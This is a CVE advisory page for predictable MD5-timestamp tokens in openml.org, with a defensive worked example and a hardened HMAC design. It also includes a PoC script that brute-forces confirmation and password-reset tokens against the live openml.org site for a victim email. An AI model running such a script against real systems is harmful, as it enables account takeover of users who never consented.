Security Vulnerability Report
CVE-2025-55796 CVSS 7.5 HIGH

Published: 2025-11-18 17:16:04
Last Modified: 2026-01-08 17:05:36

Description

The openml/openml.org web application version v2.0.20241110 uses predictable MD5-based tokens for critical user workflows such as signup confirmation, password resets, email confirmation resends, and email change confirmation. These tokens are generated by hashing the current timestamp formatted as "%d %H:%M:%S" without incorporating any user-specific data or cryptographic randomness. This predictability allows remote attackers to brute-force valid tokens within a small time window, enabling unauthorized account confirmation, password resets, and email change approvals, potentially leading to account takeover.
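
The token construction the description gives, an offline recovery of such a token over a short window, and a hardened replacement, as an added worked example. This is editorial code, not code from openml.org or its advisory: the function names, the `<expiry>.<nonce>.<mac>` token layout and the in-memory `SERVER_SECRET` are assumptions for illustration, and the sample issue time is constructed.

```python
#!/usr/bin/env python3
"""Added example (not openml.org code) for CVE-2025-55796: the MD5-of-timestamp
token the advisory describes, how little work recovering one takes, and an
HMAC-based replacement bound to user, purpose, expiry and a random nonce.
Function names and the token layout are illustrative assumptions."""
import hashlib
import hmac
import secrets
from datetime import datetime, timedelta, timezone

# --- Vulnerable construction, as described in the advisory -------------------
def vulnerable_token(now: datetime) -> str:
    """MD5 of the current time formatted "%d %H:%M:%S" (day of month, time).
    No secret and no user binding, and the month and year are not in the
    string, so the same token recurs every month."""
    return hashlib.md5(now.strftime("%d %H:%M:%S").encode()).hexdigest()

# Every value "%d %H:%M:%S" can take: 31 days * 86400 seconds.
VULNERABLE_KEYSPACE = 31 * 24 * 60 * 60  # 2,678,400 candidates in total

def recover_issue_time(token: str, reference: datetime, window_seconds: int):
    """Offline search: walk back one second at a time from `reference` and
    return the issue time whose vulnerable_token() matches, or None.
    Nothing is sent anywhere; it only shows how small the search is."""
    for delta in range(window_seconds + 1):
        candidate = reference - timedelta(seconds=delta)
        if hmac.compare_digest(vulnerable_token(candidate), token):
            return candidate
    return None

# --- Hardened replacement (assumed design, not the project's fix) ------------
# Hypothetical server-side secret; a real deployment loads it from config.
SERVER_SECRET = secrets.token_bytes(32)

def hardened_token(secret: bytes, user_id: int, purpose: str, now: datetime,
                   ttl: timedelta = timedelta(hours=1)) -> str:
    """Token = <expiry>.<nonce>.<hmac-sha256>. The MAC covers user id,
    purpose, expiry and a 128-bit random nonce under a server secret, so a
    token cannot be predicted, replayed for another user or workflow, or
    accepted after it expires."""
    expiry = int((now + ttl).timestamp())
    nonce = secrets.token_hex(16)
    msg = f"{user_id}:{purpose}:{expiry}:{nonce}".encode()
    mac = hmac.new(secret, msg, hashlib.sha256).hexdigest()
    return f"{expiry}.{nonce}.{mac}"

def verify_hardened(secret: bytes, token: str, user_id: int, purpose: str,
                    now: datetime) -> bool:
    """Recompute the MAC for the claimed (expiry, nonce) and compare in
    constant time; reject malformed, expired or mismatched tokens."""
    try:
        expiry_s, nonce, mac = token.split(".")
        expiry = int(expiry_s)
    except ValueError:
        return False
    if int(now.timestamp()) > expiry:
        return False
    msg = f"{user_id}:{purpose}:{expiry}:{nonce}".encode()
    expected = hmac.new(secret, msg, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, mac)

def demo() -> dict:
    """Run both constructions on a constructed issue time and report results."""
    issued = datetime(2025, 11, 18, 17, 16, 4, tzinfo=timezone.utc)
    tok = vulnerable_token(issued)
    # Attacker knows only that the token was issued in the last five minutes.
    found = recover_issue_time(tok, issued + timedelta(minutes=5), 600)
    good = hardened_token(SERVER_SECRET, 42, "password_reset", issued)
    tampered = good[:-1] + ("0" if good[-1] != "0" else "f")
    return {
        "vulnerable_token": tok,
        "recovered": found == issued,
        # Same day-of-month and time in a different month/year: same token.
        "month_independent": tok == vulnerable_token(
            issued.replace(year=2024, month=1)),
        "owner_ok": verify_hardened(SERVER_SECRET, good, 42, "password_reset", issued),
        "other_user": verify_hardened(SERVER_SECRET, good, 43, "password_reset", issued),
        "other_purpose": verify_hardened(SERVER_SECRET, good, 42, "signup", issued),
        "expired": verify_hardened(SERVER_SECRET, good, 42, "password_reset",
                                   issued + timedelta(hours=2)),
        "tampered": verify_hardened(SERVER_SECRET, tampered, 42, "password_reset", issued),
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Two practical points follow from the format string. Because "%d" is the day of month, the full token space is 2,678,400 values regardless of window, and a token minted at a given day and time of day is identical in every month, so an attacker does not even need to guess the issue time precisely. The hardened form above fixes prediction and cross-user reuse, but it is still replayable until expiry; a production reset flow should additionally store the token (or its hash) server-side and invalidate it on first use.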

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Weakness: CWE-400 (secondary metric, as recorded in the raw JSON below)

Caveat: the recorded vector scores availability impact only (C:N/I:N/A:H) and pairs it with CWE-400 (uncontrolled resource consumption), which does not describe the flaw above. Predictable confirmation and password-reset tokens are a confidentiality and integrity problem (account takeover) and sit closer to CWE-330 (use of insufficiently random values). Treat the description and the vendor advisory as authoritative for impact rather than the 7.5 alone.

Configurations (Affected Products)

cpe:2.3:a:openml:openml.org:*:*:*:*:*:*:*:* - VULNERABLE (versionEndIncluding 2.0.20241110)
openml/openml.org, all versions up to and including v2.0.20241110

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-55796 PoC - openml.org Predictable Token Generation
This PoC demonstrates the token prediction vulnerability in openml.org
"""
import hashlib
from datetime import datetime, timedelta
import requests


def generate_predictable_token(timestamp):
    """
    Generate token using the vulnerable MD5-based timestamp hashing
    Format: MD5("%d %H:%M:%S")
    """
    time_str = timestamp.strftime("%d %H:%M:%S")
    return hashlib.md5(time_str.encode()).hexdigest()


def generate_token_candidates(start_time, end_time, step_seconds=1):
    """
    Generate all possible tokens within a time window
    """
    candidates = []
    current = start_time
    while current <= end_time:
        token = generate_predictable_token(current)
        candidates.append((token, current))
        current += timedelta(seconds=step_seconds)
    return candidates


def brute_force_token(target_url, email, operation='signup', time_window_minutes=5):
    """
    Brute force attack to find valid token

    Args:
        target_url: Base URL of openml.org
        email: Target user email
        operation: signup, password_reset, email_change
        time_window_minutes: Time window to search
    """
    # Calculate time window. Note: the token depends on the server's clock and
    # local timezone, not the attacker's, so clock skew or a timezone offset
    # between the two means the window must be widened accordingly.
    end_time = datetime.now()
    start_time = end_time - timedelta(minutes=time_window_minutes)
    print(f"[*] Generating tokens for time window: {start_time} to {end_time}")
    candidates = generate_token_candidates(start_time, end_time)
    print(f"[*] Generated {len(candidates)} token candidates")

    # Try each token. The /confirm/<operation> path and the 'success' substring
    # are the PoC author's assumptions about the target; they are not confirmed
    # elsewhere on this page.
    for token, timestamp in candidates:
        url = f"{target_url}/confirm/{operation}"
        params = {
            'email': email,
            'token': token
        }
        try:
            response = requests.get(url, params=params, timeout=5)
            # Check for successful confirmation
            if response.status_code == 200 and 'success' in response.text.lower():
                print(f"[!] Valid token found: {token}")
                print(f"[!] Token generated at: {timestamp}")
                print(f"[!] {operation} confirmed successfully!")
                return token, timestamp
        except requests.exceptions.RequestException as e:
            print(f"[!] Request error: {e}")
            continue

    print("[-] No valid token found in time window")
    return None, None


# Example usage
if __name__ == "__main__":
    target = "https://openml.org"
    victim_email = "[email protected]"
    print("=" * 60)
    print("CVE-2025-55796 - openml.org Predictable Token PoC")
    print("=" * 60)

    # Attack scenarios
    brute_force_token(target, victim_email, 'signup', time_window_minutes=5)
    brute_force_token(target, victim_email, 'password_reset', time_window_minutes=5)
```

References

https://github.com/openml (Product)
https://github.com/openml/openml.org (Product)
https://github.com/openml/openml.org/security/advisories/GHSA-xfjh-gf9p-8qr6 (Vendor Advisory, Exploit)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-55796",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-18T17:16:04.270",
    "lastModified": "2026-01-08T17:05:35.867",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The openml/openml.org web application version v2.0.20241110 uses predictable MD5-based tokens for critical user workflows such as signup confirmation, password resets, email confirmation resends, and email change confirmation. These tokens are generated by hashing the current timestamp formatted as \"%d %H:%M:%S\" without incorporating any user-specific data or cryptographic randomness. This predictability allows remote attackers to brute-force valid tokens within a small time window, enabling unauthorized account confirmation, password resets, and email change approvals, potentially leading to account takeover."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-400"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:openml:openml.org:*:*:*:*:*:*:*:*",
                "versionEndIncluding": "2.0.20241110",
                "matchCriteriaId": "BD59856B-8D8C-4BB9-9703-F6F804713C8C"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/openml",
        "source": "[email protected]",
        "tags": ["Product"]
      },
      {
        "url": "https://github.com/openml/openml.org",
        "source": "[email protected]",
        "tags": ["Product"]
      },
      {
        "url": "https://github.com/openml/openml.org/security/advisories/GHSA-xfjh-gf9p-8qr6",
        "source": "[email protected]",
        "tags": ["Vendor Advisory", "Exploit"]
      }
    ]
  }
}
```